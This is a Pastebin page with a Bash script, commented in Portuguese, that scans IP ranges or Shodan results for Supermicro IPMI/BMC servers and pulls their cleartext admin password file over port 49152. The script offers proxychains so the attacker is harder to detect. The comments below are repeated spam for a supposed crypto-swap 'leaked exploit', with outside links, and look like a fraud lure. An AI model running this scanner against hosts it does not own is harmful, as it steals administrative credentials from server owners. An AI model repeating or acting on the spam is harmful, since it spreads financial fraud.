Googleinurl

[SCRIPT]=> Supermicro IPMI/BMC Cleartext Password Scanner

Aug 19th, 2014
2,224
0
Never
13
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.10 KB | None | 0 0
  1. #!/bin/bash
  2. # Supermicro IPMI/BMC Cleartext Password Scanner v20140622
  3. # Seguranca da Informacao VB/CG
  4. # Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
  5. #
  6. # ABOUT:
  7. # Supermicro's implementation of IPMI/BMC allows remote, unauthenticated attackers to
  8. # request the file PSBlock via port 49152. This plain text password file contains IPMI
  9. # username and password information. This script allows users to scan their networks
  10. # check for vulnerable systems that require patching.
  11. #
  12. # Como Utilizar:
  13. # ./supermicro_scan.sh 74.200.8.237 -- Single host scan
  14. # ./supermicro_scan.sh 74.200.0.0/16 proxy -- Subnet scan with proxy
  15. # ./supermicro_scan.sh showdan -- Search for vulnerable servers on ShowdanHQ
  16. #
  17. /*
  18. Scanner de Falhas em Servidores Supermicro IPMI/BMC
  19. Como sabemos há poucos dias foi descoberta uma falha que expõe mais de 32 mil senhas  administrativas dos servidores que utilizam a motherboard da Supermicro, estas senhas estão expostas com acesso pela porta 49152.
  20.  
  21. Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
  22. Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.
  23.  
  24. Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ
  25.  
  26. Basta copiar o codigo abaixo e colar em um arquivo com o nome supermicro_scan.sh
  27.  
  28. Lembrando Este script é para utilizadores de LINUX.
  29.  
  30. FONTE: http://virusbrasil.com.br/?p=106
  31. */
  32.  
  33.  
  34.  
  35.  
  36. clear
  37. echo "--==== Seguranca da Informacao VB/CG"
  38. echo "--==== Supermicro IPMI Cleartext Password Scanner"
  39. echo ""
  40. UNICORNSCAN='which unicornscan'
  41. CURL='which curl'
  42. PROXYCHAINS='which proxychains'
  43. TARGET=$1
  44. PROXY=$2
  45. if [ "$UNICORNSCAN" == "" ]; then
  46. echo "--==== Unicornscan nao instalado Saindo …"
  47. exit
  48. fi
  49. if [ "$PROXYCHAINS" == "" ]; then
  50. echo "--==== Proxychains nao instalado varredura Continuando sem suporte a proxy…"
  51. exit
  52. fi
  53. if [ "$CURL" == "" ]; then
  54. echo "--==== Curl nao esta instalado! Saindo …"
  55. exit
  56. fi
  57. if [ -z "$1" ]; then
  58. echo "--==== Usage: $0 <CIDR|IP> [proxy]"
  59. exit
  60. fi
  61. if [ $TARGET == "shodan" ]; then
  62. # SCAN USING SHODANHQ SEARCH
  63. echo "Buscando ShowdanHQ…"
  64. iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
  65. exit
  66. fi
  67. if [ "$PROXY" = "proxy" ]; then
  68. #PROXY ENABLED
  69. echo "--==== Scanning via proxy…"
  70. # SCAN FOR THE DEFAULT FILES AND PORTS
  71. for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
  72. echo "--==== Extraindo Usuario e senha from $a"
  73. echo "--==== Sending GET http://$a:49152/PSBlock"
  74. proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
  75. done
  76. exit
  77. else
  78. # NO PROXY
  79. echo "--==== Scanning via conexao direta…"
  80. # SCAN FOR THE DEFAULT FILES AND PORTS
  81. for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
  82. echo "--==== Extraindo usuario e senha from $a"
  83. echo "--==== Sending GET http://$a:49152/PSBlock"
  84. curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
  85. done
  86. exit
  87. fi
  88. echo ""
  89. echo "--==== Scan Completo!"
  90. exit
Advertisement
Comments
  • User was banned
  • Zombieloverr7
    99 days
    # CSS 0.78 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://rawtext.host/raw?44lh4m
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • flysafe
    69 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
  • User was banned
  • User was banned
  • Borasonoz
    51 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • User was banned
Add Comment
Please, Sign In to add comment